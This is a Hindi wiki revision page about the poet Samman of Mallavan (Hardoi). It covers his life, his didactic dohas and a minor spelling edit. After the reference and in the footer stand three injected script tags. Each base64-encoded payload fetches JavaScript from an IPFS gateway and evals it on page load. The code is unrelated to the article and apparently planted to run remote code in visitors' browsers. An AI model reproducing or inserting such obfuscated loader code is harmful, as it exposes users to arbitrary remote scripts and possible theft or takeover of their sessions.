Difference between revisions of "सम्मन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " दुख " to " दु:ख ")
 
Line 1: Line 1:
 
सम्मन मल्लावाँ (ज़िला हरदोई) के रहने वाले [[ब्राह्मण]] थे और [[संवत्]] 1834 में उत्पन्न हुए थे। इनके नीति के दोहे 'गिरधर की कुंडलिया' के समान गाँवों तक में प्रसिद्ध हैं। इनके कहने के ढंग में कुछ मार्मिकता है। 'दिनों के फेर' आदि के संबंध में इनके मर्मस्पर्शी दोहे स्त्रियों के मुँह से बहुत सुने जाते हैं। इन्होंने संवत् 1879 में 'पिंगल काव्यभूषण' नामक एक रीतिग्रंथ भी बनाया। पर ये अधिकतर अपने दोहों के लिए ही प्रसिद्ध हैं। इनका रचनाकाल संवत् 1860 से 1880 तक माना जा सकता है। -   
 
सम्मन मल्लावाँ (ज़िला हरदोई) के रहने वाले [[ब्राह्मण]] थे और [[संवत्]] 1834 में उत्पन्न हुए थे। इनके नीति के दोहे 'गिरधर की कुंडलिया' के समान गाँवों तक में प्रसिद्ध हैं। इनके कहने के ढंग में कुछ मार्मिकता है। 'दिनों के फेर' आदि के संबंध में इनके मर्मस्पर्शी दोहे स्त्रियों के मुँह से बहुत सुने जाते हैं। इन्होंने संवत् 1879 में 'पिंगल काव्यभूषण' नामक एक रीतिग्रंथ भी बनाया। पर ये अधिकतर अपने दोहों के लिए ही प्रसिद्ध हैं। इनका रचनाकाल संवत् 1860 से 1880 तक माना जा सकता है। -   
<poem>निकट रहे आदर घटे, दूरि रहे दुख होय।
+
<poem>निकट रहे आदर घटे, दूरि रहे दु:ख होय।
 
सम्मन या संसार में, प्रीति करौ जनि कोय
 
सम्मन या संसार में, प्रीति करौ जनि कोय
 
सम्मन चहौ सुख देह कौ तौ छाँड़ौ ये चारि।
 
सम्मन चहौ सुख देह कौ तौ छाँड़ौ ये चारि।

Latest revision as of 14:11, 2 June 2017

samman mallavaan (zila haradoee) ke rahane vale brahman the aur sanvath 1834 mean utpann hue the. inake niti ke dohe 'giradhar ki kuandaliya' ke saman gaanvoan tak mean prasiddh haian. inake kahane ke dhang mean kuchh marmikata hai. 'dinoan ke pher' adi ke sanbandh mean inake marmasparshi dohe striyoan ke muanh se bahut sune jate haian. inhoanne sanvath 1879 mean 'piangal kavyabhooshan' namak ek ritigranth bhi banaya. par ye adhikatar apane dohoan ke lie hi prasiddh haian. inaka rachanakal sanvath 1860 se 1880 tak mana ja sakata hai. -

nikat rahe adar ghate, doori rahe du:kh hoy.
samman ya sansar mean, priti karau jani koy
samman chahau sukh deh kau tau chhaan dau ye chari.
chori, chugali, jamini aur paraee nari
samman mithi bat soan hot sabai sukh poor.
jehi nahian sikho bolibo, tehi sikho sab dhoor


tika tippani aur sandarbh


achary, ramachandr shukl “prakaran 3”, hindi sahity ka itihas (hindi). bharatadiskavari pustakalay: kamal prakashan, nee dilli, prishth san. 260.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>